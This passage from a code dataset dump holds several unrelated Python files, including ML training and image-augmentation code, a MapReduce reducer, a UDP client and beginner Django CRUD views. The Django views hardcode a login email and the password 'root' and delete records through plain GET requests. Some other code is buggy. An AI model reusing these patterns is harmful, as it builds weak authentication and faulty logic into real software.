model.cuda(args.gpu)\n\n if args.optimizer == \"sgd\":\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr)\n elif args.optimizer == \"adagrad\":\n optimizer = torch.optim.Adagrad(model.parameters(), lr=args.lr)\n elif args.optimizer == \"adadelta\":\n optimizer = torch.optim.Adadelta(model.parameters(), lr=args.lr)\n elif args.optimizer == \"adam\":\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\n else:\n raise Exception(\"Unkown optimizer: {}\".format(args.optimizer))\n\n if args.save_model is not None:\n d = os.path.dirname(args.save_model)\n if d != \"\" and not os.path.exists(d):\n os.makedirs(d)\n\n crit = criterion.SequenceCrossEntropy(model, optimizer)\n results = trainer.minimize_criterion(\n crit, data_train, data_valid, args.epochs,\n save_best_model=args.save_model)\n\n best_valid_loss = min(results[\"valid_nll\"])\n best_epoch = results[\"valid_nll\"].index(best_valid_loss) + 1\n print(\"\\nBest epoch: {}\".format(best_epoch))\n print(\"Best validation nll: {}\".format(best_valid_loss))\n\n if args.save_results is not None:\n d = os.path.dirname(args.save_results)\n if d != \"\" and not os.path.exists(d):\n os.makedirs(d)\n\n print(\"Writing results json to {} ...\".format(args.save_results))\n results[\"parameters\"] = vars(args)\n with open(args.save_results, \"w\") as fp:\n json.dump(results, fp)\n","sub_path":"python_main_experimental/seq2seq_ts_trainer_main.py","file_name":"seq2seq_ts_trainer_main.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"180759612","text":"#!/usr/bin/env python3\n\nfrom operator import itemgetter\nimport sys\n\ncurrent_word = None\ncurrent_count = 0\nword = None\nreduce_final=[]\ncount=0\nj=0\n\nfor line in sys.stdin:\n\tline = line.strip()\n\tword, count = line.split('\\t', 1)\n\tcount = int(count)\n \n\n\tif current_word == word:\n\t\tcurrent_count += count\n\telse:\n\t\tif current_word:\n\t\t\treduce_final.append({\"word\":current_word,\"count\":current_count}) \n\t \n\t\tcurrent_count = count\n\t\tcurrent_word = word\n\nif current_word == word:\n\treduce_final.append({\"word\":current_word,\"count\":current_count})\n\treduce_final= sorted(reduce_final, key=itemgetter('count'),reverse=True) \n\tfor i in reduce_final:\n\t\tif(j<10):\n\t\t\tprint('{0}\\t{1}'.format(i[\"word\"], i[\"count\"]))\n\t\t\tj+=1\n","sub_path":"Part-2 N-grams/Code/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"486733668","text":"cantidad = 0\nsuma = 0\nwhile True:\n cantidad += 1\n n = int(input('Dime un número:'))\n suma = suma + n\n if n == 0:\n break\nprint('El número de números introducidos es' +' '+ str(cantidad-1))\nprint('La suma de los números introducidos son'+' '+str(suma))","sub_path":"P5 Longitud de una secuencia.py","file_name":"P5 Longitud de una secuencia.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"106721931","text":"from django import forms\nfrom .models import Posts\n\n\nclass PostForm(forms.ModelForm):\n class Meta:\n model = Posts\n fields = [\n \"title\",\n \"content\",\n ]\n\n # def clean_title(self):\n # title = self.cleaned_data.get(\"title\")\n # query = Posts.objects.filter(title__iexact=title)\n # if query.exists():\n # raise forms.ValidationError(\"Please select a new Title. This one is already used.\")\n\n","sub_path":"poss/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"453361582","text":"import heapq\nclass Solution:\n def pancakeSort(self, arr):\n used = sorted(arr)\n k = []\n while arr is not sorted(arr):\n if len(used) > 0:\n i = used.pop()\n print(arr)\n j = arr.index(i)\n arr[0:j+1] = reversed(arr[0:j+1])\n k.append(j)\n else:\n used = arr\n return k, arr\n\n\narr = [4,1,3,2,4]\ng = Solution()\nprint(g.pancakeSort(arr))","sub_path":"dynamic_programming/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"214582502","text":"import numpy as np\nimport scipy\nimport scipy.ndimage\nfrom scipy.ndimage.filters import gaussian_filter\nfrom scipy.ndimage.interpolation import map_coordinates\nimport collections\nfrom PIL import Image\nimport numbers\nfrom typing import Optional, Tuple, Union\nfrom torch.nn.functional import pad\nfrom torchio.transforms import RandomAffine, RandomFlip, RandomNoise, RandomElasticDeformation\n\ndef center_crop(x, center_crop_size):\n assert x.ndim == 3\n centerw, centerh = x.shape[1] // 2, x.shape[2] // 2\n halfw, halfh = center_crop_size[0] // 2, center_crop_size[1] // 2\n return x[:, centerw - halfw:centerw + halfw, centerh - halfh:centerh + halfh]\n\n\ndef to_tensor(x):\n import torch\n x = x.transpose((2, 0, 1))\n print(x.shape)\n return torch.from_numpy(x).float()\n\n\ndef random_num_generator(config, random_state=np.random):\n if config[0] == 'uniform':\n ret = random_state.uniform(config[1], config[2], 1)[0]\n elif config[0] == 'lognormal':\n ret = random_state.lognormal(config[1], config[2], 1)[0]\n else:\n print(config)\n raise Exception('unsupported format')\n return ret\n\n\ndef poisson_downsampling(image, peak, random_state=np.random):\n if not isinstance(image, np.ndarray):\n imgArr = np.array(image, dtype='float32')\n else:\n imgArr = image.astype('float32')\n Q = imgArr.max(axis=(0, 1)) / peak\n if Q[0] == 0:\n return imgArr\n ima_lambda = imgArr / Q\n noisy_img = random_state.poisson(lam=ima_lambda)\n return noisy_img.astype('float32')\n\n\ndef elastic_transform(image, alpha=100, sigma=30, spline_order=1, mode='nearest', random_state=np.random):\n \"\"\"Elastic deformation of image as described in [Simard2003]_.\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n \"\"\"\n assert image.ndim == 3\n shape = image.shape[:2]\n\n dx = gaussian_filter((random_state.rand(*shape) * 2 - 1),\n sigma, mode=\"constant\", cval=0) * alpha\n dy = gaussian_filter((random_state.rand(*shape) * 2 - 1),\n sigma, mode=\"constant\", cval=0) * alpha\n\n x, y = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')\n indices = [np.reshape(x + dx, (-1, 1)), np.reshape(y + dy, (-1, 1))]\n result = np.empty_like(image)\n for i in range(image.shape[2]):\n result[:, :, i] = map_coordinates(\n image[:, :, i], indices, order=spline_order, mode=mode).reshape(shape)\n return result\n\n\nclass Merge(object):\n \"\"\"Merge a group of images\n \"\"\"\n\n def __init__(self, axis=-1):\n self.axis = axis\n\n def __call__(self, images):\n if isinstance(images, collections.Sequence) or isinstance(images, np.ndarray):\n assert all([isinstance(i, np.ndarray)\n for i in images]), 'only numpy array is supported'\n shapes = [list(i.shape) for i in images]\n for s in shapes:\n s[self.axis] = None\n assert all([s == shapes[0] for s in shapes]\n ), 'shapes must be the same except the merge axis'\n return np.concatenate(images, axis=self.axis)\n else:\n raise Exception(\"obj is not a sequence (list, tuple, etc)\")\n\n\nclass Split(object):\n \"\"\"Split images into individual arraies\n \"\"\"\n\n def __init__(self, *slices, **kwargs):\n assert isinstance(slices, collections.Sequence)\n slices_ = []\n for s in slices:\n if isinstance(s, collections.Sequence):\n slices_.append(slice(*s))\n else:\n slices_.append(s)\n assert all([isinstance(s, slice) for s in slices_]\n ), 'slices must be consist of slice instances'\n self.slices = slices_\n self.axis = kwargs.get('axis', -1)\n\n def __call__(self, image):\n if isinstance(image, np.ndarray):\n ret = []\n for s in self.slices:\n sl = [slice(None)] * image.ndim\n sl[self.axis] = s\n ret.append(image[sl])\n return ret\n else:\n raise Exception(\"obj is not an numpy array\")\n\n\nclass ElasticTransform(object):\n \"\"\"Apply elastic transformation on a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, alpha, sigma):\n self.alpha = alpha\n self.sigma = sigma\n\n def __call__(self, image):\n if isinstance(self.alpha, collections.Sequence):\n alpha = random_num_generator(self.alpha)\n else:\n alpha = self.alpha\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(self.sigma)\n else:\n sigma = self.sigma\n return elastic_transform(image, alpha=alpha, sigma=sigma)\n\n\nclass PoissonSubsampling(object):\n \"\"\"Poisson subsampling on a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, peak, random_state=np.random):\n self.peak = peak\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.peak, collections.Sequence):\n peak = random_num_generator(\n self.peak, random_state=self.random_state)\n else:\n peak = self.peak\n return poisson_downsampling(image, peak, random_state=self.random_state)\n\n\nclass AddGaussianNoise(object):\n \"\"\"Add gaussian noise to a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, mean, sigma, random_state=np.random):\n self.sigma = sigma\n self.mean = mean\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(self.sigma, random_state=self.random_state)\n else:\n sigma = self.sigma\n if isinstance(self.mean, collections.Sequence):\n mean = random_num_generator(self.mean, random_state=self.random_state)\n else:\n mean = self.mean\n row, col, ch = image.shape\n gauss = self.random_state.normal(mean, sigma, (row, col, ch))\n gauss = gauss.reshape(row, col, ch)\n image += gauss\n return image\n\n\nclass AddSpeckleNoise(object):\n \"\"\"Add speckle noise to a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, mean, sigma, random_state=np.random):\n self.sigma = sigma\n self.mean = mean\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(\n self.sigma, random_state=self.random_state)\n else:\n sigma = self.sigma\n if isinstance(self.mean, collections.Sequence):\n mean = random_num_generator(\n self.mean, random_state=self.random_state)\n else:\n mean = self.mean\n row, col, ch = image.shape\n gauss = self.random_state.normal(mean, sigma, (row, col, ch))\n gauss = gauss.reshape(row, col, ch)\n image += image * gauss\n return image\n\n\nclass GaussianBlurring(object):\n \"\"\"Apply gaussian blur to a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, sigma, random_state=np.random):\n self.sigma = sigma\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(\n self.sigma, random_state=self.random_state)\n else:\n sigma = self.sigma\n image = gaussian_filter(image, sigma=(sigma, sigma, 0))\n return image\n\n\nclass AddGaussianPoissonNoise(object):\n \"\"\"Add poisson noise with gaussian blurred image to a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, sigma, peak, random_state=np.random):\n self.sigma = sigma\n self.peak = peak\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(\n self.sigma, random_state=self.random_state)\n else:\n sigma = self.sigma\n if isinstance(self.peak, collections.Sequence):\n peak = random_num_generator(\n self.peak, random_state=self.random_state)\n else:\n peak = self.peak\n bg = gaussian_filter(image, sigma=(sigma, sigma, 0))\n bg = poisson_downsampling(\n bg, peak=peak, random_state=self.random_state)\n return image + bg\n\n\nclass MaxScaleNumpy(object):\n \"\"\"scale with max and min of each channel of the numpy array i.e.\n channel = (channel - mean) / std\n \"\"\"\n\n def __init__(self, range_min=0.0, range_max=1.0):\n self.scale = (range_min, range_max)\n\n def __call__(self, image):\n mn = image.min(axis=(0, 1))\n mx = image.max(axis=(0, 1))\n return self.scale[0] + (image - mn) * (self.scale[1] - self.scale[0]) / (mx - mn)\n\n\nclass MedianScaleNumpy(object):\n \"\"\"Scale with median and mean of each channel of the numpy array i.e.\n channel = (channel - mean) / std\n \"\"\"\n\n def __init__(self, range_min=0.0, range_max=1.0):\n self.scale = (range_min, range_max)\n\n def __call__(self, image):\n mn = image.min(axis=(0, 1))\n md = np.median(image, axis=(0, 1))\n return self.scale[0] + (image - mn) * (self.scale[1] - self.scale[0]) / (md - mn)\n\n\nclass NormalizeNumpy(object):\n \"\"\"Normalize each channel of the numpy array i.e.\n channel = (channel - mean) / std\n \"\"\"\n\n def __call__(self, image):\n image -= image.mean(axis=(0, 1))\n s = image.std(axis=(0, 1))\n s[s == 0] = 1.0\n image /= s\n return image\n\n\nclass MutualExclude(object):\n \"\"\"Remove elements from one channel\n \"\"\"\n\n def __init__(self, exclude_channel, from_channel):\n self.from_channel = from_channel\n self.exclude_channel = exclude_channel\n\n def __call__(self, image):\n mask = image[:, :, self.exclude_channel] > 0\n image[:, :, self.from_channel][mask] = 0\n return image\n\n\nclass RandomCropNumpy(object):\n \"\"\"Crops the given numpy array at a random location to have a region of\n the given size. size can be a tuple (target_height, target_width)\n or an integer, in which case the target will be of a square shape (size, size)\n \"\"\"\n\n def __init__(self, size, random_state=np.random):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n self.random_state = random_state\n\n def __call__(self, img):\n w, h = img.shape[:2]\n th, tw = self.size\n if w == tw and h == th:\n return img\n\n x1 = self.random_state.randint(0, w - tw)\n y1 = self.random_state.randint(0, h - th)\n return img[x1:x1 + tw, y1: y1 + th, :]\n\n\nclass CenterCropNumpy(object):\n \"\"\"Crops the given numpy array at the center to have a region of\n the given size. size can be a tuple (target_height, target_width)\n or an integer, in which case the target will be of a square shape (size, size)\n \"\"\"\n\n def __init__(self, size):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n\n def __call__(self, img):\n w, h = img.shape[:2]\n th, tw = self.size\n x1 = int(round((w - tw) / 2.))\n y1 = int(round((h - th) / 2.))\n return img[x1:x1 + tw, y1: y1 + th, :]\n\n\nclass RandomRotate(object):\n \"\"\"Rotate a PIL.Image or numpy.ndarray (H x W x C) randomly\n \"\"\"\n\n def __init__(self, angle_range=(0.0, 360.0), axes=(0, 1), mode='reflect', random_state=np.random):\n assert isinstance(angle_range, tuple)\n self.angle_range = angle_range\n self.random_state = random_state\n self.axes = axes\n self.mode = mode\n\n def __call__(self, image):\n angle = self.random_state.uniform(\n self.angle_range[0], self.angle_range[1])\n if isinstance(image, np.ndarray):\n mi, ma = image.min(), image.max()\n image = scipy.ndimage.interpolation.rotate(\n image, angle, reshape=False, axes=self.axes, mode=self.mode)\n return np.clip(image, mi, ma)\n elif isinstance(image, Image.Image):\n return image.rotate(angle)\n else:\n raise Exception('unsupported type')\n\n\nclass BilinearResize(object):\n \"\"\"Resize a PIL.Image or numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, zoom):\n self.zoom = [zoom, zoom, 1]\n\n def __call__(self, image):\n if isinstance(image, np.ndarray):\n return scipy.ndimage.interpolation.zoom(image, self.zoom)\n elif isinstance(image, Image.Image):\n return image.resize(self.size, Image.BILINEAR)\n else:\n raise Exception('unsupported type')\n\n\nclass EnhancedCompose(object):\n \"\"\"Composes several transforms together.\n Args:\n transforms (List[Transform]): list of transforms to compose.\n Example:\n >>> transforms.Compose([\n >>> transforms.CenterCrop(10),\n >>> transforms.ToTensor(),\n >>> ])\n \"\"\"\n\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img):\n for t in self.transforms:\n if isinstance(t, collections.Sequence):\n assert isinstance(img, collections.Sequence) and len(img) == len(\n t), \"size of image group and transform group does not fit\"\n tmp_ = []\n for i, im_ in enumerate(img):\n if callable(t[i]):\n tmp_.append(t[i](im_))\n else:\n tmp_.append(im_)\n img = tmp_\n elif callable(t):\n img = t(img)\n elif t is None:\n continue\n else:\n raise Exception('unexpected type')\n return img\n\n\nclass PadToScale(object):\n def __init__(self, scale_size, fill=0, padding_mode='constant'):\n # assert isinstance(fill, (numbers.Number, str, tuple))\n # assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric']\n\n self.fill = fill\n self.padding_mode = padding_mode\n self.scale_size = scale_size\n\n @staticmethod\n def get_padding(volume, scale_size):\n target_w = scale_size[0]\n target_h = scale_size[1]\n target_z = scale_size[2]\n\n h_padding = (target_w - volume.shape[0]) / 2\n v_padding = (target_h - volume.shape[1]) / 2\n z_padding = (target_z - volume.shape[2]) / 2\n\n l_pad = h_padding if h_padding % 1 == 0 else h_padding + 0.5\n t_pad = v_padding if v_padding % 1 == 0 else v_padding + 0.5\n r_pad = h_padding if h_padding % 1 == 0 else h_padding - 0.5\n b_pad = v_padding if v_padding % 1 == 0 else v_padding - 0.5\n z0_pad = z_padding if z_padding % 1 == 0 else z_padding + 0.5\n z1_pad = z_padding if z_padding % 1 == 0 else z_padding - 0.5\n\n padding = (int(l_pad), int(t_pad), int(r_pad), int(b_pad), int(z0_pad), int(z1_pad))\n\n return padding\n\n def __call__(self, img):\n \"\"\"\n Args:\n img (Torch Tensor): Image to be padded.\n\n Returns:\n Tensor: Padded image.\n \"\"\"\n return pad(img, PadToScale.get_padding(img, self.scale_size), self.fill, self.padding_mode)\n\n def __repr__(self):\n return self.__class__.__name__ + f'(fill={self.fill}, padding_mode={self.padding_mode}, scale_size={self.scale_size})'\n\n\nclass TorchIOTransformer(object):\n def __init__(self, get_transformer, max_output_channels=10, prudent=True, verbose=False):\n self.get_transformer = get_transformer\n self.max_output_channels = max_output_channels\n self.prudent = prudent\n self.verbose = verbose\n\n def __call__(self, *inputs):\n if isinstance(inputs, collections.Sequence) or isinstance(inputs, np.ndarray):\n outputs = []\n for idx, _input in enumerate(inputs):\n # todo also apply transformer to mask and then reapply mask to input/label\n _input = _input.permute(3, 0, 1, 2) # channels first for torchio\n # Detect masks (label mask and brain mask)\n n_unique = list(_input.unique().size())[0]\n if n_unique <= self.max_output_channels or n_unique <= 2:\n transformer = self.get_transformer(mask=True)\n input_tf = transformer(_input)\n input_tf = input_tf.round()\n if _input.unique().size() != input_tf.unique().size():\n if self.verbose:\n print(f'WARNING... Input mask and its transformation differ in number of classes: '\n f'input {_input.unique().size()} vs. transformed {input_tf.unique().size()} '\n f'for {transformer} and number of voxels in initial mask: {_input.sum()}')\n if self.prudent:\n if self.verbose: print('Returning non transformed input.')\n # Avoid loss of classes by transformation\n # (either due to extreme transformation or very little voxels of a certain class present)\n return inputs # return bot all inputs untransformed\n else:\n transformer = self.get_transformer()\n input_tf = transformer(_input)\n input_tf = input_tf.permute(1, 2, 3, 0) # replace channels last\n\n outputs.append(input_tf)\n return outputs if idx >= 1 else outputs[0]\n else:\n raise Exception(\"inputs is not a sequence (list, tuple, etc)\")\n\n\nclass RandomElasticTransform(TorchIOTransformer):\n def __init__(\n self,\n num_control_points: Union[int, Tuple[int, int, int]] = 7,\n max_displacement: Union[float, Tuple[float, float, float]] = 7.5,\n locked_borders: int = 2,\n image_interpolation: str = 'linear',\n p: float = 1,\n seed: Optional[int] = None,\n max_output_channels = 10,\n verbose = False,\n prudent=True\n ):\n def get_torchio_transformer(mask=False):\n if mask:\n interpolation = 'linear'\n else:\n interpolation = image_interpolation\n return RandomElasticDeformation(num_control_points=num_control_points, max_displacement=max_displacement,\n locked_borders=locked_borders, image_interpolation=interpolation, p=p,\n seed=seed)\n super().__init__(get_transformer=get_torchio_transformer, max_output_channels=max_output_channels, verbose=verbose, prudent=prudent)\n\n\nclass RandomAffineTransform(TorchIOTransformer):\n def __init__(\n self,\n scales: Tuple[float, float] = (0.9, 1.1),\n degrees = 10,\n translation = 0,\n center: str = 'image',\n isotropic: bool = False,\n default_pad_value: Union[str, float] = 'otsu',\n image_interpolation: str = 'linear',\n p: float = 1,\n seed: Optional[int] = None,\n max_output_channels=10,\n verbose = False,\n prudent=True\n ):\n def get_torchio_transformer(mask=False):\n if mask:\n interpolation = 'linear'\n else:\n interpolation = image_interpolation\n return RandomAffine(scales=scales, degrees=degrees, translation=translation, isotropic=isotropic,\n center=center, default_pad_value=default_pad_value, image_interpolation=interpolation,\n p=p, seed=seed)\n super().__init__(get_transformer=get_torchio_transformer, max_output_channels=max_output_channels, verbose=verbose, prudent=prudent)\n\n\nclass RandomFlipTransform(TorchIOTransformer):\n def __init__(\n self,\n axes: Union[int, Tuple[int, ...]] = 0,\n flip_probability: float = 0.5,\n p: float = 1,\n seed: Optional[int] = None,\n max_output_channels=10,\n verbose = False,\n prudent=True\n ):\n def get_torchio_transformer(mask=False):\n return RandomFlip(axes=axes, flip_probability=flip_probability, p=p, seed=seed)\n super().__init__(get_transformer=get_torchio_transformer, max_output_channels=max_output_channels, verbose=verbose, prudent=prudent)\n\n\nclass RandomNoiseTransform(TorchIOTransformer):\n def __init__(\n self,\n mean: Union[float, Tuple[float, float]] = 0,\n std: Tuple[float, float] = (0, 0.25),\n p: float = 1,\n seed: Optional[int] = None,\n max_output_channels=10,\n prudent=True\n ):\n def get_torchio_transformer(mask=False):\n if mask:\n # Don't apply noise on mask\n proba = 0\n else:\n proba = p\n return RandomNoise(mean=mean, std=std, p=proba, seed=seed)\n super().__init__(get_transformer=get_torchio_transformer, max_output_channels=max_output_channels, prudent=prudent)\n\n\nclass StandardizeImage(object):\n \"\"\"\n Normalises given volume to zero mean and unit standard deviation.\n :arg norm_flag: List[bool], define which axis should be normalised and which should not\n \"\"\"\n\n def __init__(self,\n norm_flag=[True, True, True, False]):\n \"\"\"\n :param norm_flag: [bool] list of flags for normalisation, defining which axis should be normalised\n \"\"\"\n self.norm_flag = norm_flag\n\n def __call__(self, *inputs):\n # prepare the normalisation flag\n if isinstance(self.norm_flag, bool):\n norm_flag = [self.norm_flag] * len(inputs[0].shape)\n else:\n norm_flag = self.norm_flag\n outputs = []\n for idx, _input in enumerate(inputs):\n # Normalize only the image, not the mask\n if idx == 0:\n assert (len(norm_flag) == len(_input.shape))\n dim_to_reduce = ()\n for i in range(len(_input.shape)):\n if norm_flag[i]:\n dim_to_reduce += (i,)\n if norm_flag[idx]:\n # subtract the mean intensity value\n mean_val = _input.mean(dim=dim_to_reduce)\n _input = _input.add(-1.0 * mean_val)\n\n # scale the intensity values to be unit norm\n std_val = _input.std(dim=dim_to_reduce)\n _input = _input.div(1.0 * std_val)\n\n outputs.append(_input)\n\n return outputs if idx >= 1 else outputs[0]\n","sub_path":"dataio/transformation/imageTransformations.py","file_name":"imageTransformations.py","file_ext":"py","file_size_in_byte":23151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"238716819","text":"from socket import *\n\nserverName = \"localhost\"\nserverPort = 12000\nclientSocket = socket(AF_INET, SOCK_DGRAM)\n\nmessage=input(\"Input your message: \")\nclientSocket.sendto(message.lower().encode(), (serverName, serverPort))\n\nmodifiedMessage, serverAddress = clientSocket.recvfrom(2048)\n\nprint(modifiedMessage.decode())\nclientSocket.close()\n","sub_path":"dat204g19h/assignment_2/UDPClient.py","file_name":"UDPClient.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"409257199","text":"#!/usr/bin/env python\n#\n# turtle_spotter.py\n#\n# Copyright (C) (2013) STFC Rutherford Appleton Laboratory, UK.\n#\n# Author: David Waterman.\n#\n# This code is distributed under the BSD license, a copy of which is\n# included in the root directory of this package.\n\nfrom __future__ import division\n\n\"\"\"A turtle diffraction spot viewer\"\"\"\n\nclass ScriptRunner(object):\n \"\"\"Class to run script.\"\"\"\n\n def __init__(self, reflections_filename):\n \"\"\"Setup the script.\"\"\"\n\n # Filename data\n self.reflections_filename = reflections_filename\n\n def __call__(self):\n \"\"\"Run the script.\"\"\"\n import cPickle as pickle\n from dials.model.data import ReflectionList # import dependency\n from dials.util.command_line import Command\n\n # Read the pickle file\n Command.start('Reading reflection file.')\n with open(self.reflections_filename, 'rb') as f:\n self.reflections = pickle.load(f)\n\n Command.end('Read {0} spots from reflection file.'.format(\n len(self.reflections)))\n\n self.view()\n\n def view(self):\n import turtle\n coords = [ref.image_coord_mm for ref in self.reflections]\n x, y = zip(*coords)\n min_x, max_x = min(x), max(x)\n min_y, max_y = min(y), max(y)\n low = min(min_x, min_y)\n high = max(max_x, max_y)\n turtle.title(\"Reflections from \" + self.reflections_filename)\n turtle.setworldcoordinates(low, low, high, high)\n turtle.pen(speed=0,pensize=2)\n turtle.hideturtle()\n for ref in self.reflections:\n (x, y) = ref.image_coord_mm\n turtle.penup()\n turtle.setx(x)\n turtle.sety(y)\n turtle.pendown()\n turtle.circle(1.0, steps=8)\n turtle.done()\n\n\n\nif __name__ == '__main__':\n\n from optparse import OptionParser\n\n # Specify the command line options\n usage = \"usage: %prog [options] \" \\\n \"/path/to/reflections.pickle \"\n\n # Create an option parser\n parser = OptionParser(usage)\n\n # Parse the arguments\n options, args = parser.parse_args()\n\n # Print help if no arguments specified, otherwise call function\n if len(args) < 1:\n parser.print_help()\n else:\n # Initialise the script runner\n runner = ScriptRunner(\n reflections_filename=args[0])\n\n # Run the script\n runner()\n","sub_path":"scratch/dgw/turtle_spotter.py","file_name":"turtle_spotter.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"103396944","text":"# _*_ coding:utf-8 _*_\n# 文件作者: ZHMing123\n# 开发时间:2020/4/14 10:40\n# 文件名称:views.py\n# 开发工具:PyCharm\n\nfrom django.shortcuts import HttpResponse, render, redirect\n\nfrom app01 import models\n\ndef zhming(request):\n # request参数保存了所有和浏览器请求相关是数据\n return HttpResponse('hello zhming!')\n\n\ndef hello(request):\n # request参数保存了所有和浏览器请求相关是数据\n # 手动找HTML文件\n # with open(\"templates/zhming.html\", \"r\", encoding=\"utf-8\") as f:\n # data = f.read()\n # return HttpResponse(data)\n\n # Django找html文件\n return render(request, \"zhming.html\")\n\n# 登录函数\ndef login(request):\n error_msg = \"\"\n # 如果是GET请求,返回html页面\n if request.method == \"POST\":\n # 如果是POST请求,取出提交的数据,做登录判断\n # print(request.POST) # 取到所有post的数据\n email = request.POST.get(\"email\", None) # 没有\"email\"返回None\n pwd = request.POST.get(\"pwd\", None)\n print(email, pwd)\n # 判断是否登录成功\n if email == \"1424116457@qq.com\" and pwd == \"root\":\n # 登录成功\n # return HttpResponse(\"登录成功!\")\n return redirect(\"https://zhming123.github.io/\")\n\n else:\n error_msg = \"邮箱或者密码错误!\"\n\n # GET请求或者登录失败后执行\n return render(request, \"login_demo.html\", {\"error\": error_msg})\n\ndef login_validate(request):\n # request参数保存了所有和浏览器请求相关是数据\n # 获取用户提交的数据\n print(request.POST) # 取到所有post的数据\n email = request.POST.get(\"email\", None) # 没有\"email\"返回None\n pwd = request.POST.get(\"pwd\", None)\n print(email, pwd)\n # 判断是否登录成功\n if email == \"1424116457@qq.com\" and pwd == \"root\":\n return HttpResponse(\"登录成功!\")\n else:\n return HttpResponse(\"登录失败!\")\n\n# 查询函数(展示所有用户)\ndef user_list(request):\n # 去数据库中查询所有用户\n # 用ORM工具\n ret = models.Student.objects.all() # 返回一个对象列表[Student Object, Student Object)\n # print(ret)\n # print(ret[0].id, ret[0].name)\n return render(request, \"user_list.html\", {\"user_list\": ret})\n # return HttpResponse(\"ok!\")\n\n# 添加用户\ndef add_user(request):\n # 第一次请求页面时,就返回一个页面,页面上有两个框让用户输入\n error_msg = \"\"\n if request.method == \"POST\":\n # 获取POST的数据\n new_name = request.POST.get(\"username\", None)\n if new_name:\n # 去数据库中创建一条新记录\n models.Student.objects.create(name=new_name)\n # return HttpResponse(\"添加成功!\")\n # 添加成功后直接跳转到用户列表页\n return redirect(\"/user_list/\") # 跳转路径\n else:\n error_msg = \"名字不能为空!\"\n\n return render(request, \"add_user.html\", {\"error\": error_msg})\n\n\n# 删除用户\ndef delete_user(request):\n print(request.GET)\n print(\"=================================\")\n # 取到删除指定的数据(a标签是get请求)\n # 从get请求的参数中获取到要删除的数据的id值\n del_id = request.GET.get(\"id\", None)\n # print(del_id)\n # 如果能取到id值\n if del_id:\n # 去数据库删除当前id值的数据\n # 根据id值查找数据\n del_obj = models.Student.objects.get(id=del_id)\n # 删除\n del_obj.delete()\n # 返回删除后的页面\n return redirect(\"/user_list/\")\n else:\n return HttpResponse(\"要删除的数据不存在!\")\n\n\n# 编辑用户\ndef edit_user(request):\n # 修改后POST的数据\n if request.method == \"POST\":\n # 获取新的名字\n edit_id = request.POST.get(\"id\", None)\n new_name = request.POST.get(\"username\", None)\n # 更新\n # 根据id取到编辑的是哪用户\n edit_obj = models.Student.objects.get(id=edit_id)\n edit_obj.name = new_name\n edit_obj.save() # 把修改提交\n\n # 跳转\n return redirect(\"/user_list/\")\n\n\n # 从GET请求中获取到当前编辑的用户对象的id\n edit_id = request.GET.get(\"id\", None)\n if edit_id:\n # 查找到当前编辑的用户对象\n user_obj = models.Student.objects.get(id=edit_id)\n return render(request, \"edit_user.html\", {\"user\": user_obj})\n else:\n return HttpResponse(\"编辑的用户不存在!\")\n\n\n# 出版社视图\n\n# 查询函数(展示所有出版社)\ndef publisher_list(request):\n # 去数据库中查询所有出版社\n # 用ORM工具\n ret = models.Publisher.objects.all() # 返回一个对象列表[Publisher Object, Publisher Object)\n # print(ret)\n # print(ret[0].id, ret[0].name)\n return render(request, \"publisher_list.html\", {\"publisher_list\": ret})\n # return HttpResponse(\"ok!\")\n\n\n# 添加出版社\ndef add_publisher(request):\n # 第一次请求页面时,就返回一个页面,页面上有两个框让用户输入\n error_msg = \"\"\n if request.method == \"POST\":\n # 获取POST的数据\n new_name = request.POST.get(\"publisher_name\", None)\n if new_name:\n # 去数据库中创建一条新记录\n models.Publisher.objects.create(name=new_name)\n # return HttpResponse(\"添加成功!\")\n # 添加成功后直接跳转到用户列表页\n return redirect(\"/publisher_list/\") # 跳转路径\n else:\n error_msg = \"名字不能为空!\"\n\n return render(request, \"add_publisher.html\", {\"error\": error_msg})\n\n\n# 删除出版社\ndef 